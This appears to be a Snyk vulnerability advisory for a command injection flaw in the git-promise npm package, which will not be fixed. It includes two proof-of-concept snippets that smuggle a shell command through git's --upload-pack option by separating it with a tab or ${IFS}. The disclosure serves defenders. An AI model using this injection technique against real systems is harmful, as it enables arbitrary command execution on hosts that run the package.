Command Injection Affecting git-promise Open this link in a new tab package, versions *


0.0
high
  • Attack Complexity

    Low

  • Privileges Required

    High

  • Confidentiality

    High

  • Integrity

    High

  • Availability

    High

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • snyk-id

    SNYK-JS-GITPROMISE-2434310

  • published

    8 Jun 2022

  • disclosed

    28 Mar 2022

  • credit

    Liran Tal

How to fix?

There is no fixed version for git-promise.

Overview

git-promise is a Simple wrapper that allows you to run any git command using a more intuitive syntax.

Affected versions of this package are vulnerable to Command Injection due to an inappropriate fix of a prior vulnerability in this package. Note: Please note that the vulnerability will not be fixed. The README file was updated with a warning regarding this issue.

PoC 1

const git = require("git-promise");
// Use tab instead of spaces to separate between the touch command and its argument
git("fetch origin --upload-pack=touch    /tmp/abcd", {cwd: '/tmp/example-git-repo'}).then((output) => console.log(output))

PoC 2

const git = require("git-promise");
// Use the shell's predefined separator using ${IFS} to escape the whitespace splitting logic
git("fetch origin --upload-pack=touch${IFS}/tmp/abcd-new", {cwd: '/tmp/example-git-repo'}).then((output) => console.log(output))

References